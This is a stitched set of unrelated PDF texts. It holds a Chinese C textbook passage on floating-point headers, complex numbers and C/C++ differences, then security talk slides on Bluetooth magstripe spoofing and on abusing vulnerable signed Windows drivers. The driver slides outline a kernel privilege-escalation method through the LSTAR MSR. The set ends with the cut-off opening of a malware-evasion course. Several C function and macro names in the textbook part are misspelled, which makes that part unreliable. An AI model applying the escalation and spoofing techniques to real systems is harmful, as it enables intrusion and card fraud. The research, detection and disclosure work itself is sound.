FLT_MANT_DIG是p。 2.正常值和低于正常的值 正常浮点值(normalized floating-point value)的概念非常重要,下面简 要介绍一下。为简单起见,先假设系统使用十进制(b = FLT_RADIX = 10) 和浮点值的精度为 5(p = FLT_MANT_DIG = 5)(标准要求的精度更高)。 考虑下面表示31.841的方式: 指数 = 3,有效数 = .31841(.31841E3) 指数 = 4,有效数 = .03184(.03184E4) 指数 = 5,有效数 = .00318(.00318E5) 显而易见,第1种方法精度最高,因为在有效数中使用了所有的5位可用 位。规范化浮点非零值是第1位有效位为非零的值,这也是通常储存浮点数 的方式。 现在,假设最小指数(FLT_MIN_EXP)是-10,那么最小的规范值是: 指数 = -10,有效数 = .10000(.10000E-10) 通常,乘以或除以10意味着使指数增大或减小,但是在这种情况下,如 果除以10,却无法再减小指数。但是,可以改变有效数获得这种表示: 指数 = -10,有效数 = .01000(.01000E-10) 这个数被称为低于正常的(subnormal),因为该数并未使用有效数的 全精度。例如,0.12343E-10除以10得.01234E-10,损失了一位的信息。 对于这个特例,0.1000E-10 是最小的非零正常值(FLT_MIN),最小的 非零低于正常值是0.00001E-10(FLT_TRUE_MIN)。 1616 float.h中的宏FLT_HAS_SUBNURM、DBL_HAS_SUBNORM和 LDBL_HAS_SUBNORM表征实现如何处理低于正常的值。下面是这些宏可 能会用到的值及其含义: -1   不确定(尚未统一) 0    不存在(例如,实现可能会用0替换低于正常的值) 1    存在 math.h库提供一些方法,包括fpclassify()和isnormal()宏,可以识别程序 何时生成低于正常的值,这样会损失一些精度。 3.求值方案 float.h 中的宏 FLT_EVAL_METHOD 确定了实现采用何种浮点表达式的 求值方案,如下所示(有些实现还会提供其他负值选项)。 -1    不确定 0    对在所有浮点类型范围和精度内的操作、常量求值 1    对在 double 类型的精度内和 float、double 类型的范围内的操 作、常量求值,对 longdouble范围内的long double类型的操作、常量求值 2    对所有浮点类型范围内和long double类型精度内的操作和常 量求值 例如,假设程序中要把两个float类型的值相乘,并把乘积赋给第3个 float类型变量。对于选项1(即K&R C采用的方案),这两个float类型的值 将被扩展为double类型,使用double类型完成乘法计算,然后在赋值计算结 果时再把乘积转为float类型。 1617 如果选择0(即ANSI C采用的方案),实现将直接使用这两个float类型 的值相乘,然后赋值乘积。这样做比选项1快,但是会稍微损失一点精度。 4.舍入 float.h中的宏FLT_ROUNDS确定了系统如何处理舍入,其指定值所对应 的舍入方案如下所示。 -1   不确定 0    趋零截断 1    舍入到最接近的值 2    趋向正无穷 3    趋向负无穷 系统可以定义其他值,对应其他舍入方案。 一些系统提供控制舍入的方案,在这种情况下,fenv.h中的festround()函 数提供编程控制。 如果只是计算制作37个蛋糕需要多少面粉,这些不同的舍入方案可能并 不重要,但是对于金融和科学计算而言,这很重要。显然,把较高精度的浮 点值转换成较低精度值时需要使用舍入方案。例如,把double类型的计算结 果赋给float类型的变量。另外,在改变进制时,也会用到舍入方案。不同进 制下精确表示的分数不同。例如,考虑下面的代码: float x = 0.8; 在十进制下,8/10或4/5都可以精确表示0.8。但是大部分计算机系统都 以二进制储存结果,在二进制下,4/5表示为一个无限循环小数: 0.1100110011001100... 1618 因此,在把0.8储存在x中时,将其舍入为一个近似值,其具体值取决于 使用的舍入方案。 尽管如此,有些实现可能不满足 IEC 60559 的要求。例如,底层硬件可 能无法满足要求。因此,C99定义了两个可用作预处理器指令的宏,检查实 现是否符合规范。第 1 个宏是_ _STDC_IEC_559_ _,如果实现遵循IEC 60559浮点规范,该宏被定义为常量1。第2个宏是_ _STDC_IEC_559_COMPLEX_ _,如果实现遵循IEC 60559兼容复数运算,该 宏被定义为常量1。 如果实现中未定义这两个宏,则不能保证遵循IEC 60559。 B.8.2 fenv.h头文件 fenv.h 头文件提供一些与浮点环境交互的方法。也就是说,允许用户设 置浮点控制模式值(该值管理如何执行浮点运算)并确定浮点状态标志(或 异常)的值(报告运算效果的信息)。例如,控制模式设置可指定舍入的方 案;如果运算出现浮点溢出则设置一个状态标志。设置状态标志的操作叫作 抛出异常。 状态标志和控制模式只有在硬件支持的前提下才能发挥作用。例如,如 果硬件没有这些选项,则无法更改舍入方案。 使用下面的编译指示开启支持: #pragma STDC FENV_ACCESS ON 这意味着程序到包含该编译指示的块末尾一直支持,或者如果该编译指 示是外部的,则支持到该文件或翻译单元的末尾。使用下面的编译指示关闭 支持: #pragma STDC FENV_ACCESS OFF 使用下面的编译指示可恢复编译器的默认设置,具体设置取决于实现: 1619 #pragma STDC FENV_ACCESS DEFAULT 如果涉及关键的浮点运算,这个功能非常重要。但是,一般用户使用的 程度有限,所以本附录不再深入讨论。 B.8.3 STDC FP_CONTRACT编译指示 一些浮点数处理器可以把有多个运算符的浮点表达式合并成一个运算。 例如,处理器只需一步就求出下面表达式的值: x*y - z 这加快了运算速度,但是减少了运算的可预测性。STDC FP_CONTRACT 编译指示允许用户开启或关闭这个特性。默认状态取决于 实现。 为特定运算关闭合并特性,然后再开启,可以这样做: #pragma STDC FP_CONTRACT OFF val = x * y - z; #pragma STDC FP_CONTRACT ON B.8.4 math.h库增补 大部分C90数学库中都声明了double类型参数和double类型返回值的函 数,例如: double sin(double); double sqrt(double); C99和C11库为所有这些函数都提供了float类型和long double类型的函 数。这些函数的名称由原来函数名加上f或l后缀构成,例如: 1620 float sinf(float);        /* sin()的float版本 */ long double sinl(long double);   /* sin()的long double版本 */ 有了这些不同精度的函数系列,用户可以根据具体情况选择最效率的类 型和函数组合。 C99还新增了一些科学、工程和数学运算中常用的函数。表B.5.16列出 了所有数学函数的double版本。在许多情况下,这些函数的返回值都可以使 用现有的函数计算得出,但是新函数计算得更快更精确。例如,loglp(x)表 示的值与与log(1 + x)相同,但是loglp(x)使用了不同的算法,对于较小的x值 而言计算更精确。因此,可以使用log()函数作普通运算,但是对于精确要求 较高且x值较小时,用loglp()函数更好。 除这些函数以外,数学库中还定义了一些常量和与数字分类、舍入相关 的函数。例如,可以把值分为无穷值、非数(NaN)、正常值、低于正常的 值、真零。[NaN是一个特别的值,用于表示一个不是数的值。例如, asin(2.0)返回NaN,因为定义了asin()函数的参数必须是-1~1范围内的值。 低于正常的值是比使用全精度表示的最小值还要小的数。]还有一些专用的 比较函数,如果一个或多个参数是非正常值时,函数的行为与标准的关系运 算符不同。 使用C99的分类方案可以检测计算的规律性。例如,math.h中的 isnormal()宏,如果其参数是一个正常的数,则返回真。下面的代码使用该 宏在num不正常时结束循环: #include <math.h>   // 为了使用isnormal() ... float num = 1.7e-19; float numprev = num; 1621 while (isnormal(num)) // 当num为全精度的float类型值 { numprev = num; num /= 13.7f; } 简而言之,数学库为更好地控制如何计算浮点数,提供了扩展支持。 B.8.5 对复数的支持 复数是有实部和虚部的数。实部是普通的实数,如浮点类型表示的数。 虚部表示一个虚数。虚数是-1的平方根的倍数。在数学中,复数通常写作类 似4.2 + 2.0i的形式,其中i表示-1的平方根。 C99支持3种复数类型(在C11中为可选): float _Complex double _Complex long double _Compplex 例如,储存float _Complex类型的值时,使用与两个float类型元素的数组 相同的内存布局,实部值储存在第1个元素中,虚部值储存在第2个元素中。 C99和C11还支持下面3种虚类型: float _Imaginary double _Imaginary long double _Imaginary 1622 包含了complex.h头文件,就可以用complex代替_Complex,用imaginary 代替_Imaginary。 为复数类型定义的算术运算遵循一般的数学规则。例如,(a+b*I)* (c+d*I)即是(a*c-b*d)+(b*c+a*d)*I。 complex.h头文件定义了一些宏和接受复数参数并返回复数的函数。特 别是,宏I表示-1的平方根。因此,可以编写这样的代码: double complex c1 = 4.2 + 2.0 * I; float imaginary c2= -3.0 * I; C11提供了另一种方法,通过CMPLX()宏给复数赋值。例如,如果re和 im都是double类型的值,可以这样做: double complex c3 = CMPLX(re, im); 这种方法的目的是,宏在处理不常见的情况(如,im是无穷大或非数) 时比直接赋值好。 complex.h头文件提供了一些复数函数的原型,其中许多复数函数都有 对应math.h中的函数,其函数名即是对应函数名前加上c前缀。例如,csin() 返回其复数参数的复正弦。其他函数与特定的复数特性相关。例如,creal() 函数返回一个复数的实部,cimag()函数返回一个复数的虚部。也就是说, 给定一个double conplex类型的z,下面的代码为真: z = creal(z) + cimag(z) * I; 如果熟悉复数,需要使用复数,请详细阅读complex.h中的内容。 下面的示例演示了对复数的一些支持: // complex.c -- 复数 1623 #include <stdio.h> #include <complex.h> void show_cmlx(complex double cv); int main(void) { complex double v1 = 4.0 + 3.0*I; double re, im; complex double v2; complex double sum, prod, conjug; printf("Enter the real part of a complex number: "); scanf("%lf", &re); printf("Enter the imaginary part of a complex number: "); scanf("%lf", &im); // CMPLX()是C11中的一个特性 // v2 = CMPLX(re, im); v2 = re + im * I; printf("v1: "); show_cmlx(v1); putchar('\n'); 1624 printf("v2: "); show_cmlx(v2); putchar('\n'); sum = v1 + v2; prod = v1 * v2; conjug =conj(v1); printf("sum: "); show_cmlx(sum); putchar('\n'); printf("product: "); show_cmlx(prod); putchar('\n'); printf("complex congjugate of v1: "); show_cmlx(conjug); putchar('\n'); return 0; } void show_cmlx(complex double cv) { 1625 printf("(%.2f, %.2fi)", creal(cv), cimag(cv)); return; } 如果使用C++,会发现C++的complex头文件提供一种基于类的方式处理 复数,这与C的complex.h头文件使用的方法不同。 1626 B.9 参考资料IX:C和C++的区别 在很大程度上,C++是C的超集,这意味着一个有效的C程序也是一个 有效的C++程序。C和C++的主要区别是,C++支持许多附加特性。但是, C++中有许多规则与 C 稍有不同。这些不同使得 C 程序作为C++程序编译时 可能以不同的方式运行或根本不能运行。本节着重讨论这些区别。如果使用 C++的编译器编译C程序,就知道这些不同之处。虽然C和C++的区别对本书 的示例影响很小,但如果把C代码作为C++程序编译的话,会导致产生错误 的消息。 C99标准的发布使得问题更加复杂,因为有些情况下使得C更接近 C++。例如,C99标准允许在代码中的任意处进行声明,而且可以识别//注释 指示符。在其他方面,C99使其与C++的差异变大。例如,新增了变长数组 和关键字restrict。C11缩小了与C++的差异。例如,引进了char16_t类型,新 增了关键字_Alignas,新增了alignas宏与C++的关键字匹配。C11仍处于起步 阶段,许多编译器开发商甚至都没有完全支持C99。我们要了解C90、C99、 C11之间的区别,还要了解C++11与这些标准之间的区别,以及每个标准与C 标准之间的区别。这部分主要讨论C99、C11和C++之间的区别。当然, C++也正在发展,因此,C和C++的异同也在不断变化。 B.9.1 函数原型 在C++中,函数原型必不可少,但是在C中是可选的。这一区别在声明 一个函数时让函数名后面的圆括号为空,就可以看出来。在C中,空圆括号 说明这是前置原型,但是在C++中则说明该函数没有参数。也就是说,在 C++中,int slice();和int slice(void);相同。例如,下面旧风格的代码在C中可 以接受,但是在C++中会产生错误: int slice(); int main() { 1627 ... slice(20, 50); } ... int slice(int a, int b) { ... } 在C中,编译器假定用户使用旧风格声明函数。在C++中,编译器假定 slice()与slice(void)相同,且未声明slice(int, int)函数。 另外,C++允许用户声明多个同名函数,只要它们的参数列表不同即 可。 B.9.2 char常量 C把char常量视为int类型,而C++将其视为char类型。例如,考虑下面的 语句: char ch = 'A'; 在C中,常量'A'被储存在int大小的内存块中,更精确地说,字符编码被 储存为一个int类型的值。相同的数值也储存在变量ch中,但是在ch中该值只 占内存的1字节。 在C++中,'A'和ch都占用1字节。它们的区别不会影响本书中的示例。 但是,有些C程序利用char常量被视为int类型这一特性,用字符来表示整数 值。例如,如果一个系统中的int是4字节,就可以这样编写C代码: 1628 int x = 'ABCD'; /*对于int是4字节的系统,该语句出现在C程序中没问 题,但是出现在C++程序中会出错 */ 'ABCD'表示一个4字节的int类型值,其中第1个字节储存A的字符编码, 第2个字节储存B的字符编码,以此类推。注意,'ABCD'和"ABCD"不同。前 者只是书写int类型值的一种方式,而后者是一个字符串,它对应一个5字节 内存块的地址。 考虑下面的代码: int x = 'ABCD'; char c = 'ABCD'; printf("%d %d %c %c\n", x, 'ABCD', c, 'ABCD'); 在我们的系统中,得到的输出如下: 1094861636 1094861636 D D 该例说明,如果把'ABCD'视为int类型,它是一个4字节的整数值。但 是,如果将其视为char类型,程序只使用最后一个字节。在我们的系统中, 尝试用%s转换说明打印'ABCD'会导致程序奔溃,因为'ABCD'的数值 (1094861636)已超出该类型可表示的范围。 可以这样使用的原因是C提供了一种方法可单独设置int类型中的每个字 节,因为每个字符都对应一个字节。但是,由于要依赖特定的字符编码,所 以更好的方法是使用十六进制的整型常量,因为每两位十六进制数对应一个 字节。第15章详细介绍过相关内容(C的早期版本不提供十六进制记法,这 也许是多字符常量技术首先得到发展的原因)。 B.9.3 const限定符 在C中,全局的const具有外部链接,但是在C++中,具有内部链接。也 就是说,下面C++的声明: 1629 const double PI = 3.14159; 相当于下面C中的声明: static const double PI = 3.14159; 假设这两条声明都在所有函数的外部。C++规则的意图是为了在头文件 更加方便地使用 const。如果const变量是内部链接,每个包含该头文件的文 件都会获得一份const变量的备份。如果const变量是外部链接,就必须在一 个文件中进行定义式声明,然后在其他文件中使用关键字 extern 进行引用式 声明。 顺带一提,C++可以使用关键字extern使一个const值具有外部链接。所 以两种语言都可以创建内部链接和外部链接的const变量。它们的区别在于 默认使用哪种链接。 另外,在C++中,可以用const来声明普通数组的大小: const int ARSIZE = 100; double loons[ARSIZE]; /* 在C++中,与double loons[100];相同 */ 当然,也可以在C99中使用相同的声明,不过这样的声明会创建一个变 长数组。 在C++中,可以使用const值来初始化其他const变量,但是在C中不能这 样做: const double RATE = 0.06;      // C++和C都可以 const double STEP = 24.5;      // C++和C都可以 const double LEVEL = RATE * STEP; // C++可以,C不可以 B.9.4 结构和联合 1630 声明一个有标记的结构或联合后,就可以在C++中使用这个标记作为类 型名: struct duo { int a; int b; }; struct duo m; /* C和C++都可以 */ duo n; /* C不可以,C++可以*/ 结果是结构名会与变量名冲突。例如,下面的程序可作为C程序编译, 但是作为C++程序编译时会失败。因为C++把printf()语句中的duo解释成结构 类型而不是外部变量: #include <stdio.h> float duo = 100.3; int main(void) { struct duo { int a; int b;}; struct duo y = { 2, 4}; printf ("%f\n", duo); /* 在C中没问题,但是在C++不行 */ return 0; 1631 } 在C和C++中,都可以在一个结构的内部声明另一个结构: struct box { struct point {int x; int y; } upperleft; struct point lowerright; }; 在C中,随后可以使用任意使用这些结构,但是在C++中使用嵌套结构 时要使用一个特殊的符号: struct box ad;    /* C和 C++都可以 */ struct point dot;   /* C可以,C++不行 */ box::point dot;    /* C不行,C++可以 */ B.9.5 枚举 C++使用枚举比C严格。特别是,只能把enum常量赋给enum变量,然后 把变量与其他值作比较。不经过显式强制类型转换,不能把int类型值赋给 enum变量,而且也不能递增一个enum变量。下面的代码说明了这些问题: enum sample {sage, thyme, salt, pepper}; enum sample season; season = sage;      /* C和C++都可以 */ season = 2;       /* 在C中会发出警告,在C++中是一个错误 */ 1632 season = (enum sample) 3; /* C和C++都可以*/ season++;      /* C可以,在C++中是一个错误 */ 另外,在C++中,不使用关键字enum也可以声明枚举变量: enum sample {sage, thyme, salt, pepper}; sample season;  /* C++可以,在C中不可以 */ 与结构和联合的情况类似,如果一个变量和enum类型的同名会导致名 称冲突。 B.9.6 指向void的指针 C++可以把任意类型的指针赋给指向void的指针,这点与C相同。但是 不同的是,只有使用显式强制类型转换才能把指向void的指针赋给其他类型 的指针。下面的代码说明了这一点: int ar[5] = {4, 5, 6,7, 8}; int * pi; void * pv; pv = ar;     /* C和C++都可以 */ pi = pv;     /* C可以,C++不可以 */ pi = (int * ) pv; /* C和C++都可以 */ C++与C的另一个区别是,C++可以把派生类对象的地址赋给基类指 针,但是在C中没有这里涉及的特性。 B.9.7 布尔类型 1633 在C++中,布尔类型是bool,而且ture和false都是关键字。在C中,布尔 类型是_Bool,但是要包含stdbool.h头文件才可以使用bool、true和false。 B.9.8 可选拼写 在C++中,可以用or来代替||,还有一些其他的可选拼写,它们都是关键 字。在C99和C11中,这些可选拼写都被定义为宏,要包含iso646.h才能使用 它们。 B.9.9 宽字符支持 在C++中,wchar_t是内置类型,而且wchar_t是关键字。在C99和C11 中,wchar_t类型被定义在多个头文件中(stddef.h、stdlib.h、wchar.h、 wctype.h)。与此类似,char16_t和char32_t都是C++11的关键字,但是在C11 中它们都定义在uchar.h头文件中。 C++通过iostream头文件提供宽字符I/O支持(wchar_t、char16_t和 char32_t),而 C99通过wchar.h头文件提供一种完全不同的I/O支持包。 B.9.10 复数类型 C++在complex头文件中提供一个复数类来支持复数类型。C有内置的复 数类型,并通过complex.h头文件来支持。这两种方法区别很大,不兼容。C 更关心数值计算社区提出的需求。 B.9.11 内联函数 C99支持了C++的内联函数特性。但是,C99的实现更加灵活。在 C++中,内联函数默认是内部链接。在 C++中,如果一个内联函数多次出现 在多个文件中,该函数的定义必须相同,而且要使用相同的语言记号。例 如,不允许在一个文件的定义中使用int类型形参,而在另一个文件的定义中 使用int32_t类型形参。即使用typedef把int32_t定义为int也不能这样做。但是 在C中可以这样做。另外,在第15章中介绍过,C允许混合使用内联定义和 外部定义,而C++不允许。 1634 B.9.12 C++11中没有的C99/C11特性 虽然在过去C或多或少可以看作是C++的子集,但是C99标准增加了一 些C++没有的新特性。下面列出了一些只有C99/C11中才有的特性: 指定初始化器; 复合初始化器(Compound initializer); 受限指针(Restricted pointer)(即,restric指针); 变长数组; 伸缩型数组成员; 带可变数量参数的宏。 注意 以上所列只是在特定时期内的情况,随着时间的推移和 C、C++的不断 发展,列表中的项会有所增减。例如,C++14新增的一个特性就与C99的变 长数组类似。 [1].也称为世界标准时间,简称UTC,从英文“Coordinated Universal Time”/法 文“Temps Universel Cordonné”而来。中国内地的时间与UTC的时差为+8,也 就是UTC+8。——译者注 [2].fwide()函数用于设置流的定向,根据mode的不同值来执行不同的工作。 ——译者注 1635
pdf
Exploiting 0ld Mag-stripe Information with New Technology Salvador Mendoza Twitter: @Netxing Blog: salmg.net About Me ● Security Researcher ● Samsung Pay: Tokenized Numbers, Flaws and Issues @Netxing Analyzing previous talks/tools ● Major Malfunction DEFCON 14 Magstripe Madness ● Samy Kamkar MagSpoof - 2015 ● Weston Hecker DEFCON 24 Hacking Hotel Keys and Point of Sale Systems @Netxing Intro to Magnetic Stripe Information ● Type of card capable of storing data by modifying the magnetism of tiny iron-based magnetic particles on a band of magnetic material on the card ● TL;DR –> Track1 = [UPPERCASE,numbers] Track 2/3 = Numbers Source: samy.pl @Netxing Magstripe Composition %B4929555123456789^MALFUNCTION/MAJOR ^0902201010000000000000970000000? @Netxing Magstripe info, Parity, and Waves @Netxing Magstripe info, Parity, and Waves @Netxing Magstripe Signal @Netxing Major Malfunction DEFCON 14 https://www.youtube.com/watch?v=ITihB1c3dHw @Netxing BlueSpoof Descendancy MagSpoof MagSpoofPI SamyKam First Prototypes https://www.samy.pl Designed PCB by @electronicats Weston Hecker - DEFCON 24 @Netxing Sound Amplifier @Netxing Raspberry Pi + Amplifier + Coil @Netxing Raspberry Pi - Demo @Netxing Bluetooth Technology @Netxing Bluetooth Speaker @Netxing Bluetooth Speaker @Netxing MagSpoof Cousin BlueSpoof MagSpoof Electronic Cats(@electronicats) design @Netxing BlueSpoof @Netxing BlueSpoof tool - Characteristics ● Cheap < $20 ● Easy to implement ● Escalable ● 3.7 V Battery ● Fast transmission ● Accurate @Netxing BlueSpoof - Demo https://www.youtube.com/watch?v=elzqLhLnCek @Netxing Multiple Targets? @Netxing Token 1 Token 2 Controlling Multiple Speakers? @Netxing Python Sound Device Library https://pypi.python.org/pypi/sounddevice Attack with Multiple Bluetooth Speakers? https://www.youtube.com/watch?v=5hInVNLUC8s @Netxing Demo Bonus Take-Away Project: iWey @Netxing + = SamyKam https://salmg.net/2017/01/16/samykam/ @Netxing Greetz, Hugs & Stuff Samy Kamkar (@samykamkar) Electronic Cats (@electronicats) RMHT (raza-mexicana.org) Los Razos! @Netxing Questions? Salvador Mendoza Twitter: @Netxing Blog: salmg.net sal@salmg.net Thank you! Happy Hacking Anniversary! Resources Samy Kamkar: samy.pl/magspoof Electronic Cats: twitter.com/electronicats Major Malfunction: youtube.com/watch?v=ITihB1c3dHw Weston Hecker: youtube.com/watch?v=mV_0k9Fh590 @Netxing
pdf
Jesse Michael Mickey Shkatov @JesseMichael @HackingThings WHO ARE WE AGENDA • Beginning • . • . • . • . • Conclusions • Q&A • Diego Juarez • https://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities • https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities • https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities • @ReWolf • https://github.com/rwfpl/rewolf-msi-exploit + Blog post link in Readme • @NOPAndRoll (Ryan Warns) / Timothy Harrison • https://downloads.immunityinc.com/infiltrate2019-slidepacks/ryan-warns-timothy-harrison-device- driver-debauchery-msr-madness/MSR_Madness_v2.9_INFILTRATE.pptx • @SpecialHoang • https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition- e73ee523598b PRIOR WORK BACKGROUND Application Windows OS Driver Device BACKGROUND Application Windows OS Driver Device REQUEST MAGIC REQUEST DeviceIoControl(dev, ioctl, inbuf, insize, ...) IOCTL handler in driver called with IRP struct • contains args passed from userspace 2.3. Windows drivers 2.3.1. Signed 2.3.2. WHQL signed 2.3.3. EV signing cert (A Must for Win10 signing process) Briefly explain the process of signing code HOW IT’S MADE • RWEverything • LoJax • Slingshot • Game Cheats and Anti-Cheats (CapCom and others) • MSI+ASUS+GIGABYTE+ASROCK KNOWN THREATS • Utility to access almost all hardware interfaces via software • User-space app + signed RwDrv.sys driver • Driver acts as a privileged proxy to hardware interfaces • Allows arbitrary access to privileged resources not intended to be available to user-space • CHIPSEC helper to use RwDrv.sys when available Read & Write Everything • First UEFI malware found in the wild • Implant tool includes RwDrv.sys driver from RWEverything • Loads driver to gain direct access to SPI controller in PCH • Uses direct SPI controller access to rewrite UEFI firmware LoJax • APT campaign brought along its own malicious driver • Active from 2012 through at least 2018 • Exploited other drivers with read/write MSR to bypass Driver Signing Enforcement to install kernel rootkit Slingshot 1. Privilege escalation from Userspace to Kernelspace 2. Bypass/disable Windows security mechanisms 3. Direct hardware access • Can potentially rewrite firmware Motivations 1. Driver is already on system and loaded • Access to driver is controlled by policy configured by driver itself • Many drivers allow access by non-admin 2. Driver is already on system and not loaded • Need admin privs to load driver • Can also wait until admin process loads driver to avoid needing admin privs 3. Malware brings driver along with it • Need admin privs to load driver • Can bring older version of driver • Lojax did this for in-the-wild campaign Attack Scenarios 1. Signed drivers 2. Focused on drivers from firmware/hardware vendors 3. Size (< 100KB) 4. rdmsr/wrmsr, mov crN, in/out opcodes are big hints 5. Windows Driver Model vs Windows Driver Framework Finding drivers Windows Driver Model Windows Driver Framework Finding drivers IoCreateDevice vs. WdmlibIoCreateDeviceSecure Security Descriptor Definition Language (SDDL) • Used to specify security policy for driver Example: • D:P(A;;GA;;;SY)(A;;GA;;;BA) DACL that allows: • GENERIC_ALL to Local System • GENERIC_ALL to Built-in Administrators Finding drivers • Spent 2 weeks looking for drivers • We skimmed though hundreds of files • At least 42 vulnerable signed x64 drivers • Found others since ¯\_(ツ)_/¯ Finding drivers What can we do from user space with a bad driver? • Physical memory access • MMIO • MSR Read & Write • Control register access • PCI device access • SMBUS • And more... NOW WHAT Arbitrary Ring0 memcpy • Can be used to patch kernel code and data structures • Steal tokens, elevate privileges, etc • PatchGuard can catch some modifications, but not all Arbitrary Physical Memory Write • Another mechanism to patch kernel code and data structures • Steal tokens, elevate privileges, etc • PatchGuard can catch some modifications, but not all • Can also be used to perform MMIO access to PCIe and other devices Lookup Physical Address from Virtual Address • Useful when dealing with IOCTLs that provide Read/Write using physical addresses Arbitrary MSR Read Model Specific Registers • Originally used for "experimental" features not guaranteed to be present in future processors • Some MSRs have now been classified as architectural and will be supported by all future processors • MSRs can be per-package, per-core, or per-thread • Access to these registers are via rdmsr and wrmsr opcodes • Only accessible by Ring0 Arbitrary MSR Write Security-critical architectural MSRs • STAR (0xC0000081) • SYSCALL EIP address and Ring 0 and Ring 3 Segment base • LSTAR (0xC0000082) • The kernel's RIP for SYSCALL entry for 64 bit software • CSTAR (0xC0000083) • The kernel's RIP for SYSCALL entry in compatibility mode Entrypoints used in transition from Ring3 to Ring0 Arbitrary Control Register Read CR0 contains key processor control bits: • PE: Protected Mode Enable • WP: Write Protect • PG: Paging Enable CR3 = Base of page table structures CR4 contains additional security-relevant control bits: • UMIP: User-Mode Instruction Prevention • VMXE: Virtual Machine Extensions Enable • SMEP: Supervisor Mode Execution Protection Enable • SMAP: Supervisor Mode Access Protection Enable Arbitrary Control Register Write CR0 contains key processor control bits: • PE: Protected Mode Enable • WP: Write Protect • PG: Paging Enable CR3 = Base of page table structures CR4 contains additional security-relevant control bits: • UMIP: User-Mode Instruction Prevention • VMXE: Virtual Machine Extensions Enable • SMEP: Supervisor Mode Execution Protection Enable • SMAP: Supervisor Mode Access Protection Enable Arbitrary IO Port Write • How dangerous this is depends on what's in the system • Servers may have ASPEED BMC with Pantdown vulnerability which provides read/write into BMC address space via IO port access • Laptops likely have embedded controller (EC) reachable via IO port access • Can potentially be used to perform legacy PCI access by accessing ports 0xCF8/0xCFC Arbitrary Legacy PCI Write • How dangerous this is depends on what's in the system • Issues with overlapping PCI device BAR over memory regions • Overlapping PCI device over TPM region • Memory hole attack • Can we get our own code signing cert? • Process and cost. • Legality CAN I DO IT TOO? Putting it all together High-level steps to escalate from Ring3 to Ring0 via MSR access • Allocate buffer for Ring0 payload • Read LSTAR MSR to find address of kernel syscall handler • Generate payload that immediately restores LSTAR MSR and performs malicious Ring0 actions • Write address of payload to LSTAR MSR • Payload immediately executes in Ring0 on next syscall entry It's a little more complicated than that... Supervisor Mode Execution Prevention (SMEP) • Feature added to CPU to prevent kernel from executing code from user pages • Attempting to execute code in user pages when in Ring0 causes page fault • Controlled by bit in CR4 register Need to read CR4, clear CR4.SMEP bit, write back to CR4 • This can be done via Read/Write CR4 IOCTL primitive or via ROP in payload • Payload starts executing in Ring0, but hasn't switched to kernelspace yet • Need to execute swapgs as first instruction • Also need to execute swapgs before returning from kernel payload • Kernel Page Table Isolation (KPTI) • New protection to help mitigate Meltdown CPU vulnerability • Separate page tables for userspace and kernelspace • Need to find kernel page table base and write that to CR3 • We can use CR3 read IOCTL to leak Kernel CR3 value when building payload It's a little more complicated than that... • AV industry • What good is an AV when you can bypass it, and how can the AV help stop this lunacy. • Microsoft • Virtualization-based Security (VBS) • Hypervisor-enforced Code Integrity (HVCI) • Device Guard • Black List IS THERE HOPE? • Manually searching drivers can be tedious • Can we automate the process? • Symbolic execution with angr framework • Got initial script working in about a day • Works really well in some cases • Combinatorial state explosion in others Automating Detection Automating Detection • Testing out the idea... • Load the driver into angr • Create a state object to start execution at IOCTL handler Automating Detection • Testing out the idea... • Create symbolic regions for parts of IRP • Store those into symbolic memory • And set appropriate pointers in execution state Automating Detection • Testing out the idea... • Create simulation manager based on state • Explore states trying to reach the address of WRMSR opcode • If found, show where the WRMSR arguments came from Automating Detection • It worked! • Completed in less than five seconds • WRMSR address and value are both taken from input buffer Automating Detection • We can also automatically find IOCTL handler function • Set memory write breakpoint on drvobj->MajorFunction[14] • Explore states forward from driver entry point Automating Detection • Problems... • Current code only supports WDM drivers • Have some ideas how to support WDF drivers • Angr uses VEX intermediate representation lifting • VEX is part of Valgrind • Has apparently never been used to analyze privileged code • Decode error on rdmsr/wrmsr, read/write CR, read/write DR opcodes • Some drivers cause it blow up and use 64GB of ram DISCLOSURES DISCLOSURES DISCLOSURES • Ask Microsoft what’s their policy regarding bad drivers • Not a security issue, open a regular ticket • This might be an issue, are you sure? • Meh, Not an issue • Are you REALLY, REALLY, sure? • Ok, let us check • … • Ok, We will do something about it • THANK YOU! • Sent disclosure Friday 5pm • Response came back Saturday morning • Fix ready to start deployment in 6 weeks DISCLOSURES All the primitives in one driver • Physical and virtual memory read/write • Read/Write MSR • Read/Write CR • Legacy Read/Write PCI via IN/OUT • IN/OUT DISCLOSURES ADVISORIES Vendor Date Advisory Intel July 9, 2019 https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa- 00268.html Huawei July 10, 2019 https://www.huawei.com/fr/psirt/security-advisories/huawei-sa-20190710-01- pcmanager-en Phoenix TBD TBD REDACTED Aug 13, 2019 TBD REDACTED TBD TBD NO RESPONSE Microsoft Statement • Microsoft has a strong commitment to security and a demonstrated track record of investigating and proactively updating impacted devices as soon as possible. For the best protection, we recommend using Windows 10 and the Microsoft Edge browser. • In order to exploit vulnerable drivers, an attacker would need to have already compromised the computer. To help mitigate this class of issues, Microsoft recommends that customers use Windows Defender Application Control to block known vulnerable software and drivers. • Customers can further protect themselves by turning on memory integrity for capable devices in Windows Security. • Bad drivers can be immensely dangerous • Risk remains when old drivers can still be loaded by Windows • We want to kill off this entire bug class Conclusions • GitHub release of all of our code • https://github.com/eclypsium/Screwed-Drivers Code release Questions?
pdf
Module 3 Understanding and countering malware’s evasion and self-defence https://github.com/hasherezade/malware_training_vol1 Introduction Malware: Evasion and self-defense Malware: Evasion and self-defense • In order to carry on its mission, malware must remain undetected • Malware needs to defend itself from: • Antimalware products (on the victim machine) • Analysis tools and sandboxes (on a researcher’s machine) Malware: Evasion and self-defense • Approaches: • Passive: • obfuscation (at the level of: code, control flow, strings, used APIs) • Active: • environment fingerprinting, detection of the analysis tools and: • interference in them (i.e. uninstalling AV products, unhooking hooks) • altering own behavior (deploying a decoy, or terminating execution) The passive approach: obfuscation • Related with the way code is designed: i.e. using exception handlers to switch between various code blocks, using dynamically loaded functions, string obfuscation, polymorphic code, etc • Added at the compilation level: i.e. adding junk instructions, complicating control flow (example: movfuscator) • Added at linking level: atypical PE header, atypical sections alignment • Post-compilation: using protectors • Depending on the degree with the obfuscation, may be difficult to defeat Deobfuscation • Approaches: • Dynamic: • Code intrumentation, tracing: allows to quickly find out what the code does, without reconstructing all details of the implementation – quick and 